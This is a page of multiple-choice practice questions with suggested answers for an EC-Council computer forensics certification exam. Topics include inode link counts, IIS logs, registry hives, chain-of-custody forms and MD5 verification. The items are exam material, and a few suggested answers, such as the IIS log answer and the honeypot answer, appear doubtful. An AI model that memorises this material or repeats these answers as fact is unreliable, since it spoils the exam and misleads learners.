ExamGecko

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 3

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A. 0
B. 10
C. 100
D. 1
Suggested answer: A

When examining the log files from a Windows IIS Web Server, how often is a new log file created?

A. the same log is used at all times
B. a new log file is created every day
C. a new log file is created each week
D. a new log is created each time the Web Server is started
Suggested answer: A

Which part of the Windows Registry contains the user's password file?

A. HKEY_LOCAL_MACHINE
B. HKEY_CURRENT_CONFIGURATION
C. HKEY_USER
D. HKEY_CURRENT_USER
Suggested answer: A

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not affected by the magnet.

A. logical
B. anti-magnetic
C. magnetic
D. optical
Suggested answer: D

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?

A. Use a system that has dynamic addressing on the network
B. Use a system that is not directly interacting with the router
C. Use it on a system in an external DMZ in front of the firewall
D. It doesn't matter as all replies are faked
Suggested answer: D

What does the acronym POST mean as it relates to a PC?

A. Primary Operations Short Test
B. PowerOn Self Test
C. Pre Operational Situation Test
D. Primary Operating System Test
Suggested answer: B

Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?

A. bench warrant
B. wire tap
C. subpoena
D. search warrant
Suggested answer: D

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.

Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

A. All forms should be placed in an approved secure container because they are now primary evidence in the case.
B. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.
C. The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.
D. All forms should be placed in the report file because they are now primary evidence in the case.
Suggested answer: B

The MD5 program is used to:

A. wipe magnetic media before recycling it
B. make directories on an evidence disk
C. view graphics files on an evidence drive
D. verify that a disk is not altered when you examine it
Suggested answer: D

Which is a standard procedure to perform during all computer forensics investigations?

A. with the hard drive removed from the suspect PC, check the date and time in the system's CMOS
B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table
C. with the hard drive removed from the suspect PC, check the date and time in the system's RAM
D. with the hard drive in the suspect PC, check the date and time in the system's CMOS
Suggested answer: A
Total 704 questions